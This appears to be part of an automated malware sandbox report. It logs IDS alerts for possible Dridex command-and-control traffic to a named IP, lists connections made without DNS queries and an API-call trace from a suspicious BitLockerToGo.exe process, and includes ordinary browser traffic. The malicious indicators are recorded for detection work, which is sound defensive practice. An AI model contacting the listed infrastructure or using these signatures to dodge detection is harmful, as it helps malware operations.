                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50111 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50133 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50117 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50036 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50019 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50100 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50139 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50088 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50025 -> 77.239.117.222:443
                  Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49745 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_00403C79
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.239.117.222Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.ed97448f67caacb1a1dd.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.96ac23719317b1928681.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.5da1d823f3d7131a6bff.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.7cbcca50273230cade4d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.a665aac5e1c351cb0ec3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1739448876435&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2719AE970809620B08BEBB0509A16321&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1739448876435&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=d69ec62d4a9f4ef7a7c5dbf11dd10db6&activityId=d69ec62d4a9f4ef7a7c5dbf11dd10db6&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":40,"imageId":"BB1msG0Z","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=394cf2e4-e8a3-4bcf-a9da-86a43c010199; ai_session=l7I5qVhDsExpipSAvgy4+q|1739448876424|1739448876424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=394cf2e4-e8a3-4bcf-a9da-86a43c010199; ai_session=l7I5qVhDsExpipSAvgy4+q|1739448876424|1739448876424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1739448876435&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2719AE970809620B08BEBB0509A16321&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B7d7f5dcbc37b60cc63e471739448878; XID=1B7d7f5dcbc37b60cc63e471739448878
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1739448876435&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=d69ec62d4a9f4ef7a7c5dbf11dd10db6&activityId=d69ec62d4a9f4ef7a7c5dbf11dd10db6&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=32A3978F1BE342E1A43367B19C5F5B76&MUID=2719AE970809620B08BEBB0509A16321 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1; SM=T; msnup=%7B%22cnex%22%3A%22no%22%7D
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.1973895323.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973978198.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973831800.00005AF00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const 